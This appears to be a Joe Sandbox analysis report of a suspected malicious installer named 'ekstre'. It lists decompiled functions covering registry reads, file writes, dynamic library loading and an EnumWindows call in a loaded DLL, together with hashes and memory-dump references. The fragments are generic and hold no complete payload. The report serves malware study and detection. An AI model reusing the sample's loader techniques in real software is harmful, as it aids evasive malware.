Associated: 00000000.00000002.1181679975.000000006DE80000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181869899.000000006DE84000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181977025.000000006DE86000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6de80000_ekstre.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-0
Opcode ID: 074ecf58ed5caacf1647ad589764c50ea5256d5ee91a6fc942944415a36f9df1
Instruction ID: c606c82f0b92d3443e6ee0a8d7710f62c18c5f45087d6a8ada55b547c8dbd670
Opcode Fuzzy Hash: 074ecf58ed5caacf1647ad589764c50ea5256d5ee91a6fc942944415a36f9df1
Instruction Fuzzy Hash: 3941C67140434A9FCB219FA8C944BAA37EDBF12319F31801DEA6E6A283CF359544D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0040611B Relevance: 3.0, APIs: 2, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040611B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x2000;
				_t21 = E004060BA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20); // executed
					_t30[0x1fff] = _t30[0x1fff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406129
0x0040612b
0x00406143
0x00406148
0x0040614d
0x0040618a
0x0040618a
0x0040614f
0x00406161
0x0040616c
0x00406172
0x0040617c
0x00000000
0x00000000
0x0040617c
0x0040618f

APIs

RegQueryValueExA.KERNELBASE(-00008098,007BDF00,00000000,?,007BDF00,00002000,007BDF00,?,?,-00008098,-00008098,00000002,-00008098,?,004063D3,80000002), ref: 00406161
RegCloseKey.KERNELBASE(-00008098,?,004063D3,80000002,Software\Microsoft\Windows\CurrentVersion,-00008098,007BDF00,007BDF00,?,Skipped: C:\Users\user\AppData\Local\Temp\nsrCFD6.tmp\System.dll), ref: 0040616C

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 7056b7a96e9edebd67e9f8198eb1911ecb61e0a26e20b736ac15770181a1f0eb
Instruction ID: 454a0a257b23ff5dc715ee1e92252fb99340fc497e2045281c6685e12c18df0f
Opcode Fuzzy Hash: 7056b7a96e9edebd67e9f8198eb1911ecb61e0a26e20b736ac15770181a1f0eb
Instruction Fuzzy Hash: E0015E72500209BFDF218F51CC09FDB3BA9EF55394F01803AFD5996191D274D964DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7c5f90;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7c1f4c =  *0x7c1f4c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x7c1f4c, 0x7530,  *0x7c1f34), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e8767fc4308ce77e1ef00f61b5c19187fbfe80af0fb56f169463e399743e325e
Instruction ID: 94a94e43fb3c158426163a02108a3c171968d0c2e7a0bb146e3e03d0305ae0e9
Opcode Fuzzy Hash: e8767fc4308ce77e1ef00f61b5c19187fbfe80af0fb56f169463e399743e325e
Instruction Fuzzy Hash: B601D1326242109FE7195B389D04B6A3698E711314F50813EB855F61F1DB788C129B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00406640 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406640(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E004065D2(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406648
0x0040664b
0x00406652
0x0040665a
0x00406666
0x00000000
0x0040666d
0x0040665d
0x00406664
0x00000000
0x00406675
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000000,?,004034D2,0000000B), ref: 00406652
GetProcAddress.KERNEL32(00000000,?), ref: 0040666D

Part of subcall function 004065D2: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065E9
Part of subcall function 004065D2: wsprintfA.USER32 ref: 00406622
Part of subcall function 004065D2: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406636

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
Instruction ID: 242b18aafc5ba73b32c5259cbd30a1984926b7b349da2466b6a1c90bd4b5b0b3
Opcode Fuzzy Hash: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
Instruction Fuzzy Hash: 50E0863260421067D2215670AE08D3B72B89E84750702083EF547F2140DB399C31966D

Uniqueness

Uniqueness Score: -1.00%

Function 00405DC7 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405DC7(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405dcb
0x00405dd8
0x00405ded
0x00405df3

APIs

GetFileAttributesA.KERNELBASE(00000003,00402F4C,007FD000,80000000,00000003,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00405DCB
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00405DED

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405DA2 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DA2(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405da7
0x00405dad
0x00405db2
0x00405dbb
0x00405dbb
0x00405dc4

APIs

GetFileAttributesA.KERNELBASE(?,?,004059BA,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DA7
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DBB

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction ID: 7f45f9ba69b867d106863cc71afb49232cba123af4407f869067be58f469fa57
Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction Fuzzy Hash: 8DD0C972514532ABC2112728AE0C89BBF65DB54271702CA36FDA5A26B2DB304C569A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405898 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405898(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x0040589e
0x004058a6
0x00000000
0x004058ac
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403383,007F9000,007F9000,007F9000,007F9000,007F9000,0040366D,?,00000007,00000009,0000000B), ref: 0040589E
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058AC

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction ID: d432be32c0a1bb5554f51fee73349b76f5b6546a091cca3b6415829ac7b01f4f
Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction Fuzzy Hash: 4BC04C31204601AEE6106B209E08B1B7A94AF50741F15843D6546E00A0DB3C8465D92D

Uniqueness

Uniqueness Score: -1.00%

Function 6DE82BC4 Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E6DE82BC4(intOrPtr _a4) {
				signed int _v8;
				void* __ebx;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t44;
				void* _t47;
				signed int _t53;
				void* _t58;
				intOrPtr _t64;
				intOrPtr _t67;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t75;
				signed int _t78;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				intOrPtr _t86;
				intOrPtr _t87;

				if( *0x6de85024 != 0 && E6DE81B3E(_a4) == 0) {
					 *0x6de85030 = _t86;
					if( *0x6de85034 != 0) {
						_t86 =  *0x6de85034;
					} else {
						E6DE83100(E6DE81BA7());
						 *0x6de85034 = _t86;
					}
				}
				_t28 = E6DE81BAD(_a4);
				_t87 = _t86 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E6DE81B38();
					_t67 = _a4;
					_t74 =  *0x6de85028;
					 *((intOrPtr*)(_t29 + _t67)) = _t74;
					 *0x6de85028 = _t67;
					E6DE81BBE();
					_t33 = EnumWindows(??, ??); // executed
					 *0x6de85000 = _t33;
					 *0x6de85004 = _t74;
					if( *0x6de85024 != 0 && E6DE81B3E( *0x6de85028) == 0) {
						 *0x6de85034 = _t87;
						_t87 =  *0x6de85030;
					}
					_t75 =  *0x6de85028;
					_a4 = _t75;
					 *0x6de85028 =  *((intOrPtr*)(E6DE81B38() + _t75));
					_t37 = E6DE81B2A(_t75);
					_pop(_t76);
					if(_t37 != 0) {
						_t37 = E6DE81BAD(_t76);
						if(_t37 > 0) {
							_push(_t37);
							_push(E6DE81BB8() + _a4 + _v8);
							_push(E6DE81BC8());
							if( *0x6de85024 <= 0 || E6DE81B3E(_a4) != 0) {
								_pop(_t81);
								_pop(_t44);
								if( *((intOrPtr*)(_t44 + _t81)) == 2) {
								}
								_pop(_t76);
								_t37 = _t44 + _v8;
								asm("loop 0xfffffff5");
							} else {
								_pop(_t82);
								_pop(_t47);
								_t78 =  *(_t47 + _t82);
								_t64 =  *0x6de85034;
								_t76 = _t64 + _t78 * 4;
								 *0x6de85034 = _t64 + _t78 * 4;
								_t37 = _t47 + _v8;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x6de85028 == 0) {
						 *0x6de85034 = 0;
					}
					E6DE82B72(_t37, _t64, _t76, _a4,  *0x6de85000,  *0x6de85004);
					return _a4;
				}
				_push(E6DE81BB8() + _a4);
				_t53 = E6DE81BC4();
				_v8 = _t53;
				_t72 = _t28;
				_push(_t65 + _t53 * _t72);
				_t64 = E6DE81C27();
				_t80 = E6DE81C23();
				_t83 = E6DE81BC8();
				_t58 = _t72;
				if( *((intOrPtr*)(_t58 + _t83)) == 2) {
					_push( *((intOrPtr*)(_t58 + _t64)));
				}
				_push( *((intOrPtr*)(_t58 + _t80)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x6de82bd4
0x6de82be5
0x6de82bf2
0x6de82c06
0x6de82bf4
0x6de82bf9
0x6de82bfe
0x6de82bfe
0x6de82bf2
0x6de82c0f
0x6de82c14
0x6de82c1a
0x6de82c5e
0x6de82c5e
0x6de82c63
0x6de82c68
0x6de82c6e
0x6de82c70
0x6de82c76
0x6de82c83
0x6de82c85
0x6de82c8a
0x6de82c97
0x6de82caa
0x6de82cb0
0x6de82cb6
0x6de82cb7
0x6de82cbd
0x6de82cc9
0x6de82ccf
0x6de82cd7
0x6de82cd8
0x6de82cdb
0x6de82ce6
0x6de82ce8
0x6de82cf4
0x6de82cfa
0x6de82d02
0x6de82d2e
0x6de82d2f
0x6de82d35
0x6de82d35
0x6de82d38
0x6de82d39
0x6de82d3c
0x6de82d12
0x6de82d12
0x6de82d13
0x6de82d15
0x6de82d18
0x6de82d1e
0x6de82d21
0x6de82d27
0x6de82d2a
0x6de82d2a
0x6de82d02
0x6de82ce6
0x6de82d45
0x6de82d47
0x6de82d47
0x6de82d60
0x6de82d6e
0x6de82d6e
0x6de82c25
0x6de82c26
0x6de82c2b
0x6de82c2f
0x6de82c34
0x6de82c48
0x6de82c49
0x6de82c4a
0x6de82c4c
0x6de82c51
0x6de82c53
0x6de82c53
0x6de82c56
0x6de82c5c
0x00000000

APIs

EnumWindows.USER32(?), ref: 6DE82C83

Memory Dump Source

Source File: 00000000.00000002.1181790668.000000006DE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6DE80000, based on PE: true

Associated: 00000000.00000002.1181679975.000000006DE80000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181869899.000000006DE84000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181977025.000000006DE86000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6de80000_ekstre.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 81bcfd21644aa86c26b4443267dcdf02ec076bcd4291f590dd88bc1e70632f33
Instruction ID: 5c55abe33912d8a1f0aea5c6244231d6cfee3eb4995c364e158e82297751aa7a
Opcode Fuzzy Hash: 81bcfd21644aa86c26b4443267dcdf02ec076bcd4291f590dd88bc1e70632f33
Instruction Fuzzy Hash: B541A075909204DFDF209FA4DA44B693BF4EB1632DF314429E609DF266EF34D4418B80

Uniqueness

Uniqueness Score: -1.00%

Function 00405E6E Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E6E(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e72
0x00405e82
0x00405e8a
0x00000000
0x00405e91
0x00000000
0x00405e93

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FB,00000000,0079AD20,000000FF,0079AD20,000000FF,000000FF,00000004,00000000), ref: 00405E82

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
